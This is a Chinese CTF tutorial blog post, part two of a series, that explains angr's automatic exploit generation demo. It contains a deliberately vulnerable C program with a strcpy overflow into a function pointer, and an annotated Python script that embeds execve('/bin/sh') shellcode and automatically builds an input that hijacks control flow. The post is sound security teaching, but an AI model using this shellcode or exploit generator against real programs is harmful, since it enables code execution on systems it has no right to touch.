CTF中的AEG(二) 基于 angr 的漏洞利用自动生成之缓冲区溢出案例分析

已于 2022-04-06 09:48:15 修改
阅读量797 收藏 2
点赞数
分类专栏: CTF 文章标签: 网络安全
于 2022-04-06 09:47:23 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/yongbaoii/article/details/122596046
版权

在一步一步靠近ctf实战的aeg解体过程中,我们首先使用angr给的一个demo来熟悉angr如何使用的。

用到的源码链接

源码

#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#include <unistd.h>
#include <sys/mman.h>

char component_name[128] = {0};

typedef struct component {
    char name[32];
    int (*do_something)(int arg);
} comp_t;

int sample_func(int x) {
    printf(" - %s - recieved argument %d\n", component_name, x);
}

comp_t *initialize_component(char *cmp_name) {
    int i = 0;
    comp_t *cmp;

    cmp = malloc(sizeof(struct component));
    cmp->do_something = sample_func;

    printf("Copying component name...\n");
    strcpy(cmp->name, cmp_name);

    cmp->name[i] = '\0';
    return cmp;
}

int main(void)
{
    comp_t *cmp;

    printf("Component Name:\n");
    read(0, component_name, sizeof component_name);
    
    printf("Initializing component...\n");
    cmp = initialize_component(component_name);    

    printf("Running component...\n");
    mprotect((void*)((long)&component_name & ~0xfff), 0x1000, PROT_READ | PROT_EXEC);
    cmp->do_something(1);
}

给的这个源码逻辑很简单
定义了一个component结构体,结构体里面一个名字,一个函数。
函数会给个print函数
我们可以输入名字,用这个名字来创建一个结构体
但是漏洞就在于名字最多可以128,但是给的那个结构体长度只有32,会造成缓冲区溢出

查看了一下保护
在这里插入图片描述
因为没有开NX,我们可以直接把shellcode写在里面,然后覆盖函数指针为shellcode的地址,即可利用。

import os
import sys
import angr
import subprocess
import logging

from angr import sim_options as so

l = logging.getLogger("insomnihack.simple_aeg")


# shellcraft i386.linux.sh
shellcode = bytes.fromhex("6a68682f2f2f73682f62696e89e331c96a0b5899cd80")

def fully_symbolic(state, variable):
    '''
    check if a symbolic variable is completely symbolic
    '''
	  #上面有个官方注释说检查是否有符号化变量完全符号化
    for i in range(state.arch.bits):   #总共需要判断那么多位
        if not state.solver.symbolic(variable[i]):  #判断的内容是那个玩意有没有符号化
            return False

    return True
#

def check_continuity(address, addresses, length):
    '''
    dumb way of checking if the region at 'address' contains 'length' amount of controlled memory.
    '''
		#就是检查地址加上长度是不是都是受控的,能用的
		
    for i in range(length):
        if not address + i in addresses:
            return False

    return True

def find_symbolic_buffer(state, length):
    '''
    dumb implementation of find_symbolic_buffer, looks for a buffer in memory under the user's control
    '''
		# 找内存中可以用的缓冲区
    # get all the symbolic bytes from stdin
    stdin = state.posix.stdin #传入程序的所有符号变量
		
    sym_addrs = [ ]
    for _, symbol in state.solver.get_variables('file', stdin.ident):  #遍历符号
        sym_addrs.extend(state.memory.addrs_for_name(next(iter(symbol.variables))))  #返回带内存符号的符号变量

    for addr in sym_addrs:  #把地址取出来检查一下
        if check_continuity(addr, sym_addrs, length):
            yield addr

def main(binary):
    p = angr.Project(binary, auto_load_libs=False)  #初始化一个angr项目,第一个参数是二进制程序,第二个参数是不去自动加载lib库
    binary_name = os.path.basename(binary)  #获得二进制文件的路径名
    extras = {so.REVERSE_MEMORY_NAME_MAP, so.TRACK_ACTION_HISTORY}  #是一个字典
    es = p.factory.entry_state(add_options=extras) #把那个字典当参数来获得一个以二进制入口为开始的状态
    sm = p.factory.simulation_manager(es, save_unconstrained=True) #初始化模拟管理器 后面的参数说的是将不受约束的状态放在这

    # find a bug giving us control of PC
    l.info("looking for vulnerability in '%s'", binary_name)
    #输出一个信息,就是说在找那个漏洞点
    exploitable_state = None
    while exploitable_state is None:
        print(sm)
        sm.step() #将所有状态单步推进一个基本块
        if len(sm.unconstrained) > 0:
            l.info("found some unconstrained states, checking exploitability")
            #就像他说的发现有不受约束的状态
            for u in sm.unconstrained:  #遍历不受约束的状态
                if fully_symbolic(u, u.regs.pc):  #判读的是pc
                    exploitable_state = u  #把可利用的状态拿出来
                    break

            # no exploitable state found, drop them
            sm.drop(stash='unconstrained')
					#跟注释一样,如果没找到能利用的状态,就删掉它
					#然后说了句话说没找到可利用状态
    l.info("found a state which looks exploitable")
    ep = exploitable_state
		#判断寄存器 pc 是否为符号值。若是,这代表我们可以控劫持控制流,该状态可利用,跳出循环。如果未约束状态无法利用
		
    assert ep.solver.symbolic(ep.regs.pc), "PC must be symbolic at this point"
		#这里说现在程序肯定都符号化了
		#然后在尝试去找可利用的路子
    l.info("attempting to create exploit based off state")

    # keep checking if buffers can hold our shellcode
    # 一直检查看buffer能不能装的下我们的shellcode
    for buf_addr in find_symbolic_buffer(ep, len(shellcode)):
        l.info("found symbolic buffer at %#x", buf_addr) #这就是找到的buffer
        memory = ep.memory.load(buf_addr, len(shellcode)) #用符号拿出内存来
        sc_bvv = ep.solver.BVV(shellcode) #将shellcode转化为位向量

        # check satisfiability of placing shellcode into the address
        # 检查shellcode放入那个内存的可满足行
        #如果满足那两条约束,就加上那两条约束
        #约束时buffer能写shellcode
        #pc可以指向buffer
        if ep.satisfiable(extra_constraints=(memory == sc_bvv,ep.regs.pc == buf_addr)):
            l.info("found buffer for shellcode, completing exploit")
            ep.add_constraints(memory == sc_bvv)
            l.info("pointing pc towards shellcode buffer")
            ep.add_constraints(ep.regs.pc == buf_addr)
            break
    else:
        l.warning("couldn't find a symbolic buffer for our shellcode! exiting...")
        return 1
		
		#对标准输入进行约束求解,然后写进文件
    filename = '%s-exploit' % binary_name
    with open(filename, 'wb') as f:
        f.write(ep.posix.dumps(0))

    print("%s exploit in %s" % (binary_name, filename))
    print("run with `(cat %s; cat -) | %s`" % (filename, binary))
    return 0

def test():
    main('./demo_bin')
    assert subprocess.check_output('(cat ./demo_bin-exploit; echo echo BUMO) | ./demo_bin', shell=True) == b'BUMO\n'
#一个test函数,把生成的文件里面的输入拿出来给了程序,看能不能成功

if __name__ == '__main__':
    # silence some annoying logs
    # 让日志的一些输出停下来
    logging.getLogger("angr").setLevel("CRITICAL")
    l.setLevel("INFO")

    if len(sys.argv) > 1:
        sys.exit(main(sys.argv[1]))
    else:
        print("%s: <binary>" % sys.argv[0])

脚本的解释都在注释了

跑一下
在这里插入图片描述看得出来是成了

yongbaoii
关注
专栏目录
逆向工具angr的快捷教程(3):CTF解题实例
白马负金羁
06-30 842
angr是一个基于Python开发的进制程序分析(Binary analysis)框架,可以用于开展动态符号执行(Symbolic Execution)和多种静态分析。事实上,Symbolic Execution也正是angr的一个代表性功能
Zeratool:自动利用漏洞利用AEG)和远程标志捕获来解决可利用CTF问题
04-29
Zeratool 自动利用漏洞利用AEG)和远程标志捕获来解决可利用CTF问题 该工具使用通过挂接printf并查找来协整地分析进制文件。 然后,这些程序状态通过和一系列脚本技巧被武器化以用于远程代码执行。 最后,在本地对有效负载进行测试,然后将其提交给远程CTF服务器以恢复该标志。 正在安装 Zeratool已在Ubuntu 16.04上进行了测试,并且已将安装脚本从Ubuntu 12.04设置为Ubuntu 18.04。 ./install.sh 用法 Zeratool是一个python脚本,它接受进制文件作为参数,还可以选择链接的libc库,以及CTF Server连接信息 [chris:~/Zeratool] [angr] python zeratool.py -h usage: zeratool.py [-h] [-l LIBC] [-u URL] [-p PORT]
CTF竞赛进制类题型解析(逆向工程、进制漏洞利用缓冲区溢出
最新发布
白帽子凯哥聊黑客
12-13 2556
描述:一个程序使用了自定义通信协议。分析并理解协议细节。答案:捕获和分析网络流量,逆向工程协议。
CTFAEG(一) 基础知识
yongbaoii的博客
04-06 842
很早之前学习的 忘了还有这玩意
XCTF-攻防世界CTF平台-PWN类——1、Mary_Morton(格式化字符串漏洞缓冲区溢出漏洞
Onlyone_1314的博客
09-09 1438
目录标题一级目录级目录1、查看程序基本信息2、反编译程序3、攻击思路(1)先利用功能2格式化字符串漏洞(2)找到功能1的sub_400960()函数返回地址的位置方法 一级目录 级目录 1、查看程序基本信息 Mary_Morton程序,先用file查看: Linux下64位的ELF文件 再用checksec查看 程序开启了Partial RELRO、NX和Canary,没有PIE。程序开启了canary,就不能直接利用栈溢出覆盖返回地址了。因为在初始化一个栈帧时在栈底(stack overflow
使用angr自动利用简单缓冲区溢出漏洞-insomnihack_aeg
HappyOrange2014的专栏
11-09 141
然后,进入initialize_component模块开始初始化,创建36字节的cmp结构体,把sample_func设置为cmp结构体的do_something方法,将开始输入的最多128字节的component_name拷贝到32字节的cmp->name并把第一个字节改为\0,这里就造成了缓冲区溢出,使得do_something方法地址可以被替换。这样,当拷贝发生时,结构体的do_something方法地址可以被替换为component_name地址,从而从component_name处开始执行。
pwnlib:基于C ++的进制文件分析CTF pwn利用代码生成框架
02-20
基于C ++的进制文件分析CTF pwn利用代码生成框架。玩得开心! 简介 基于Linux平台下的C ++ 11标准,为CTF pwn的堆利用堆生成过渡生成一个快速利用脚本。 该程序仍在开发,目前包含Half_Auto_Mod和Auto_Mod这...
Angr_Tutorial_For_CTF:ctfangr教程
04-30
angr是一个非常有用的进制分析框架。 许多ctfer喜欢使用angr节省他们在CTF的时间。 但是,对于初学者来说,angr有点困难,因为它从版本7更新到了版本8。而且许多CTF有关angr的出色教程都无法正常运行。 我...
符号执行angrctf逆向题组
12-28
符号执行是一种在软件分析和逆向工程广泛使用的高级技术,尤其在解决CTF(Capture The Flag)竞赛的逆向题目时。它主要用于探索程序的所有可能执行路径,从而理解和分析程序的行为。`angr`是一个强大的开源软件...
#逆向分析系列#逆向0X02|什么是缓冲区溢出
MR王峰的专栏
11-04 360
本篇是逆向分析的延伸篇,讲的是关于缓冲区溢出。简单来讲,缓冲区溢出就是“输入数据超出了程序规定的内存范围,数据溢出导致程序发生异常”,黑客通过缓冲区溢出后,重写栈的ret_addr内容来执行任意代码。 在对缓冲区攻击前,我们需要了解栈是如何使用内存空间的。栈是一种内存的使用方式,采用LIFO即后进先出,像手枪的子弹一样。 如下代码: void func(i...
IDA逆向分析缓冲区溢出攻击漏洞实例.rar
03-12
很好的逆向分析的学习资料!!! https://blog.csdn.net/wlwdecs_dn/article/details/114708775
缓冲区溢出原理及Linux系统下实例
LJFYYJ的博客
04-11 1789
1.缓冲区溢出的两个操作: 破坏栈 smash the stack 修饰函数返回地址 modify the return address of the function 2.内存的存储分配: from high address to low address: command-line arguments and environment variables:程序运行之前存在的变量和环境...
angr找到strcpy的栈溢出漏洞
^_^
06-29 890
这篇文章其实是分析angr文档里给出的一个挖漏洞的小例子。 原文链接在此:https://docs.angr.io/examples#beginner-vulnerability-discovery-example-strcpy_find 这是第一个用angr进制里找可利用条件的教程。第一个例子是一个非常简单的程序。这个angr脚本会从程序的entry到strcpy找到一条路径。(只有我们能够控制strcpy的参数的时候) 为了找到正确的路径,angr需要去算一个密码参数,算这个密码,angr只要2s
Angr实例分析——strcpy_find续
zhuzhuzhu22的博客
06-04 848
      上周看到Angr代码有些迷茫,因为自己的毕业设计需要使用到Angr所以才开了Angr源码分析这个坑,但是呢,我发现读源码的+官方API的方式学习效率太低了,思来想去还是从工程实际入手可能会快一点。后续更新可能没有之前那么快了(因为毕设的内容不好公开写到博客里,毕竟我要毕业嘛),但是我一旦找到想和大家分享的内容,会第一时间更新到博客里的。同时可能会穿插着找工作时候的算法题和代码(马上就要...
CTF-数据分析(七)
热门推荐
→_→
08-07 2万+
声明:以下CTF题均来自网上收集,在这里主要是给新手们涨涨见识,仅供参考而已。需要题目数据包的请私信或在下方留言。 13.数据包分析-SSL Sniff (来源:hack-dat-kiwi-ctf-2015) 1.关卡描述 我们收到了MITMd的HTTPS请求的网络捕获文件。尝试找到罪魁祸首。 下载附件并从获取Flag值进行提交。 2.解题步骤 2.1 点击题目查看描述并下载附,用wireshark打开数据包。 2.2 我...
Angr:一个具有动态符号执行和静态分析进制分析工具
zxcxq的博客
08-08 939
什么是angrangr是一个进制代码分析工具,能够自动化完成进制文件的分析,并找出漏洞。在进制代码寻找并且利用漏洞是一项非常具有挑战性的工作,它的挑战性主要在于人工很难直观的看出进制代码的数据结构、控制流信息等。angr是一个基于python的进制漏洞分析框架,它将以前多种分析技术集成进来,­­­它能够进行动态的符号执行分析(如,KLEE和Mayhem),也能够进行多种静态
Automatic Exploit Generation:漏洞利用自动化
omnispace的博客
05-09 4579
漏洞利用进制安全的核心内容之一。当安全研究员挖掘到一个新的漏洞时,首先要做的事情就是尝试写POC和exploit。所谓POC,一般来说就是一个能够让程序崩溃的输入,且能够证明控制寄存器或者其他违反安全规则的行为。Exploit则条件更严格一些,是对漏洞的完整利用,通常以弹出一个shell作为目标。 从程序到漏洞再到利用,这个过程需要对进制程序(或者加上源代码)及其运行...
angr学习00
weixin_52971884的博客
09-20 129
angr学习00 IDA显示 workon angr进入angr的环境 ipythom import angr #就行导包 P=angr.Project ("./ 00_angr_find") #创建一个工程 init_state = P.factory. entry_state()入口点 sm=P.factory.simulation_manager(init_state)#初始化状态 sm.explore(find=0x08048678)#想到达的地方 sm.found[0]#查看成功的情况
CTF训练(密码学)——一步之遥
i2423374729的博客
04-19 266
CTF训练(密码学)——一步之遥 题目已经告诉我们是位移密码了 将题目下载下来 解压后打开 解题: 考察移位密码,题目提示64m/s的速度,联想到base64编码。>>联想到==,ascii码差了一位题目本身也提示一步(A Step),所以移动位数为1位。 于是我们写一个python脚本 再base64解码得到flag:SeBaFi{a24bccba30824eab8d40168cf1c1ff5a} ...
深入学习:缓冲区溢出攻防实战
"Q版缓冲区溢出教程由王炜原著,经整理者破船整理成文档,旨在方便学习者理解缓冲区溢出概念并提供学习资料。文档指出,缓冲区溢出是普遍且危险的漏洞,可能导致程序崩溃、系统不稳定甚至权限提升。作者分享了自己...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值